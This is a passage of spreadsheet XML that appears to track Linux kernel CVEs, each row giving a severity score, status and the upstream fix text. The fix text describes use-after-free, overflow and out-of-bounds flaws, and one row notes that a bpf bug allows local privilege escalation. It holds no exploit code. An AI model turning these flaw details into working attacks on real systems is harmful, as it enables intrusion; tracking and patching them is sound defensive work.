struct mutex.  On CONFIG_DEBUG_MUTEXES the missing magic value trips a
"lock used without init" splat; on a production kernel the fast path
acquires the lock via CMPXCHG(owner, 0, current).  In the latter case
a second writer that arrives before init_gssp_clnt() re-zeroes owner
can enter set_gssp_clnt() concurrently, shut down the first writer's
clnt while it is still in use, and leak the loser's clnt.
Fix by initializing sn-&gt;gssp_lock in sunrpc_init_net() so its lifetime
matches the sunrpc_net it lives in.  sn-&gt;gssp_clnt is already NULL from
the kzalloc that backs net_generic storage, so the lazy helper is no
longer needed; drop init_gssp_clnt(), its prototype, and the call from
create_use_gss_proxy_proc_entry().  sunrpc.ko is a build-time
dependency of auth_rpcgss.ko, so sunrpc_init_net() has always run on
every netns before any auth_gss pernet init can publish the proc
entry.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89540</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89545</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: defer rq_argp and rq_resp free until after RCU grace period
svc_rqst_free() frees rqstp-&gt;rq_argp and rqstp-&gt;rq_resp synchronously
via kfree(), but defers the rqstp struct free via kfree_rcu().  After
svc_exit_thread() calls list_del_rcu() and svc_rqst_free(), there is
a window where RCU readers that started before list_del_rcu() can still
traverse the thread list and find the rqstp.  These readers (e.g.
nfsd_nl_rpc_status_get_dumpit()) dereference rqstp-&gt;rq_argp, which has
already been freed — a use-after-free.
Fix this by moving the kfree of rq_argp and rq_resp into an explicit
call_rcu() callback alongside the struct free.  Resources not accessed
by RCU readers (bvec, buffer pages, scratch folio, auth_data) remain
synchronously freed.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89545</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89548</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: always drain cache_cleaner before destroying a cache_detail
sunrpc_destroy_cache_detail() only cancels the global cache_cleaner
delayed_work when cache_list is empty.  During per-netns teardown
cache_list is never empty because init_net's caches remain registered,
so the cancel never fires.  After unlink, the caller proceeds to
cache_destroy_net() which kfrees the cache_detail while cache_clean()
may still hold a dangling pointer to it.  The result is a
use-after-free: cache_dequeue() takes cd-&gt;queue_lock on freed memory,
and cache_put() dereferences cd-&gt;cache_put as a function pointer from
freed slab.
Drop the list_empty guard so that cancel_delayed_work_sync() always
runs, ensuring any in-flight cache_clean() completes before the
cache_detail is freed.  Re-arm the cleaner afterwards if other caches
are still registered.</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89548</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89553</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nouveau/gem: reserve the bo in the info ioctl around the vma lookup
In the non-uvmm path, there could be a race between the info lookup
finding the vma, and the gem close path closing the vma leading
to a use-after-free.
Spotted with the help of Opus 4.6.</t>
        </is>
      </c>
      <c r="S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89553</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89557</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: do overflow check for sb-&gt;bblog_shift in super_1_load()
In super_1_load(), sb-&gt;bblog_shift is an __u8 type value loaded from on-
disk superblock. It is used for badblocks API badblocks_set() by the
following sequence,
 1930   rdev-&gt;badblocks.shift = sb-&gt;bblog_shift;
 1931   for (i = 0 ; i &lt; (sectors &lt;&lt; (9-3)) ; i++, bbp++) {
 1932           u64 bb = le64_to_cpu(*bbp);
 1933           int count = bb &amp; (0x3ff);
 1934           u64 sector = bb &gt;&gt; 10;
 1935           sector &lt;&lt;= sb-&gt;bblog_shift;
 1936           count &lt;&lt;= sb-&gt;bblog_shift;
 1937           if (bb + 1 == 0)
 1938                   break;
 1939           if (!badblocks_set(&amp;rdev-&gt;badblocks, sector, count, 1))
 1940                   return -EINVAL;
 1941   }
bb-&gt;bblog_shit is in range of 0-255, variable sector is 64bit width, for
an invalid bb-&gt;bblog_shit, it is possible to make sector be overflowed
by the following calculation,
 1935           sector &lt;&lt;= sb-&gt;bblog_shift;
Then in turn when call badblocks_set() at line 1939 with the invalid
rdev-&gt;badblocks.shift set at line 1930, may result an overflow inside
_badblocks_clear() in block/badblocks.c.
Although there are many places to call badblocks APIs, the non-zero
shift value is only used in super_1_load(), other places always use 0 as
the shift value. Therefore it is unnecessary to do a general shift value
overflow check inside badblock API, and just check here as the caller.
This may avoid unnecessary check, make the badblocks API code more simple
and elegant.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89557</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89559</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libnvdimm/labels: Prevent integer overflow in __nd_label_validate()
The on-media namespace index field nslot is a u32 read from the DIMM
label storage area.  __nd_label_validate() bounds it against the config
area size, but sizeof_namespace_label() returns unsigned, so the product
nslot * label_size is evaluated in 32-bit and wraps modulo 2^32 before
the comparison.  A crafted nslot passes the bound and is then used as the
loop trip count in nd_label_data_init(), whose memset() walks off the end
of the config_size buffer: an out-of-bounds write.
The field is not trusted -- it comes from the medium, or from userspace
via ND_CMD_SET_CONFIG_DATA.  Evaluate the product in 64-bit so the bound
check is exact; conforming labels are unaffected.
The check was safe when introduced by commit 4a826c83db4e ("libnvdimm:
namespace indices: read and validate"): it multiplied by sizeof(struct
nd_namespace_label), a size_t, so on a 64-bit build the product did not
wrap.  Commit 564e871aa66f ("libnvdimm, label: add v1.2 nvdimm label
definitions") narrowed it to 32 bits when the label size became a runtime
value read via sizeof_namespace_label().</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89559</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89562</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip6_gre: fix hardware header length for NBMA tunnels
ip6gre_tnl_link_config_route() accumulates the lower device's hardware
header length into dev-&gt;hard_header_len whenever header_ops is set. This
is incorrect for both users of header_ops.
ip6gretap and ip6erspan have a fixed Ethernet hardware header length.
For an NBMA ip6gre tunnel, ip6gre_header() creates only the GRE header,
the optional FOU or GUE header, and the outer IPv6 header. The lower
device header is headroom needed later, not part of the tunnel device's
hardware header.
Keep the lower device header in needed_headroom. Set hard_header_len to
the tunnel header length only for ARPHRD_IP6GRE devices with header_ops,
and leave the fixed Ethernet header length unchanged for tap and erspan
devices.</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89562</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89563</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip6_tunnel: use skb_cow_head() in ip6_tnl_xmit()
ip6_tnl_xmit() may need to expand headroom before it can push the
outer IPv6 and optional encap headers. It currently does that with
skb_realloc_headroom(), copies skb-&gt;sk ownership, consumes the original
skb, and then continues processing with the replacement skb kept only in
its local variable.
That is safe only if the helper cannot fail afterwards. But this helper
still has post-reallocation error exits. collect_md tunnels reject
non-NONE encap after the replacement, and ip6_tnl_encap() can also fail
later. In those cases the helper returns an error to its callers while
the caller still only has the original skb pointer.
Both ip6_tnl_start_xmit() and the IPv6 GRE paths free the caller skb on
error, so they can end up freeing an skb that ip6_tnl_xmit() already
consumed.
Use skb_cow_head() instead. It provides the required headroom and
writability without privately replacing the caller-owned skb, so later
error returns cannot leave callers with a stale pointer.
The Ethernet users, ip6gretap and ip6erspan, clear IFF_TX_SKB_SHARING
and already call skb_cow_head() before entering ip6_tnl_xmit(). They do
not rely on the removed skb_shared() reallocation. This also makes the
IPv6 tunnel path consistent with ip_tunnel_xmit().</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89563</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89564</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip: orphan prefetched skbs before multicast forwarding
IPv4 and IPv6 input preserve an skb-&gt;sk association installed by
bpf_sk_assign() so that local delivery can use the selected socket under
RCU. Both address families can also prefetch a socket in UDP early demux.
In both paths (BPF and UDP early demux) a reference is not guaranteed to
be held on the socket.
When a multicast packet is not locally deliverable, IPv6 hands the
original skb to ip6_mr_input(). IPv4's ip_mr_input() similarly keeps the
original skb when local delivery is not needed. Either path can put the
skb on an unresolved multicast route queue or forward it after the
receive-side RCU section ends.
After the prefetched socket is destroyed, a later skb free invokes
sock_pfree() and dereferences the stale skb-&gt;sk. Orphan the skb before
each non-local multicast forwarding path. Local delivery retains the
original skb; the existing skb_clone() calls provide multicast forwarding
with a socket-free clone.</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89564</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89570</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/mce: Make the MCE notifier per-region
Flavien Solt reported lifetime issues with the CXL MCE notifier, which
can lead to NULL dereferences and use-after-free in the MCE handler.
The notifier was registered per memory device and stored in 'struct
cxl_memdev_state', even though it only needs the region state (the
region's SPA range and its extended linear cache size).
Instead of keeping the memory device and endpoint alive, the correct fix
is to move the notifier into 'struct cxl_region' and register it from
cxl_region_probe() as it should be a per-region notifier. Setup the
registration to only happen for regions that have an extended linear
cache as that is the only current usage.
Remove cxl_port_get_spa_cache_alias() as it is now dead code.
[ dj: Update dev_warn() when notifier fails due to kconfig. (Ben) ]</t>
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89570</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89573</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm array: reject an array block whose value size is not the caller's
array_block_check() can only compare the header against itself, so a block
with value_size 4 and max_entries 1018 is internally consistent and passes.
dm-cache keeps two arrays -- mappings at 8 bytes and hints at 4 -- and the
roots for both live in the superblock. Point the mappings root at a hint
block and __load_mappings() walks it through an info whose value size is 8,
so element_at() strides 8 bytes over 4-byte entries and reaches offset 8160
of a 4096-byte block.
get_ablock() and __shadow_ablock() are the two places that hold the block
and the caller at once. Reject there when the two value sizes disagree.
Arrays only ever read their own blocks, so this fires on crafted metadata
only.</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89573</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89574</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm array: validate array block headers on read
array_block_check() validates blocknr and csum and nothing else, while
node_check(), next to it, has bounded the structural fields since both
were written. dm_array_cursor_next() takes its loop bound from the
on-disk nr_entries and element_at() is unguarded pointer arithmetic, so
a count larger than the block holds keeps the cursor in one block while
the index grows past it and the read walks off the dm-bufio buffer --
dm_cache_load_mappings() drives it once per cache block at activation.
Check the header against itself: reject a zero value_size, require
max_entries to equal calc_max_entries() for that value_size and block
size, and require nr_entries to fit. Equality rather than an upper bound,
since a count below the real capacity trips BUG_ON() in fill_ablock() and
trim_ablock(). Metadata dm-array writes satisfies all three.</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89574</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89579</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Harden bloom filter sizing and indexing on 32-bit kernels
bloom_map_alloc() has two 32-bit-specific problems when the computed
bitmap reaches the U32_MAX fallback case.
First, BITS_TO_BYTES(U32_MAX) is evaluated with 32-bit arithmetic. The
addition performed by DIV_ROUND_UP wraps, so the map allocates only the
fixed-size bloom filter object while keeping bitset_mask == U32_MAX.
Subsequent updates can then write past the allocated object.
Second, fixing only the allocation size is not sufficient. The bloom hash
is a u32, but set_bit() takes a signed long bit number and x86 test_bit()
eventually feeds the index to variable_test_bit(long, ...). On 32-bit
kernels, hashes in [0x80000000, U32_MAX] therefore become negative bit
offsets. x86 bt/bts with a memory operand interpret those offsets relative
to the supplied base, so a map with bitset_mask == U32_MAX can read or
write before bloom-&gt;bitset even after allocating the full 512 MiB bitmap.
Keep the U32_MAX fallback, but split each hash into a word pointer and an
in-word bit number before calling test_bit() or set_bit(). The bitops
argument is then always in [0, BITS_PER_LONG - 1], while BIT_WORD(h) still
selects the intended word in the full bitmap.
Compute the bitset size from (u64)bitset_mask + 1 before passing the final
size to bpf_map_area_alloc(). This fixes the original under-allocation and
keeps the allocated storage consistent with the addressable bitset.
Exploitation note: local privilege escalation is possible on a 32-bit x86
kernel using the under-allocation bug from a binary with CAP_BPF.</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89579</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89580</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disable preemption in __bpf_get_stack
get_perf_callchain() returns a per-CPU perf_callchain_entry buffer and
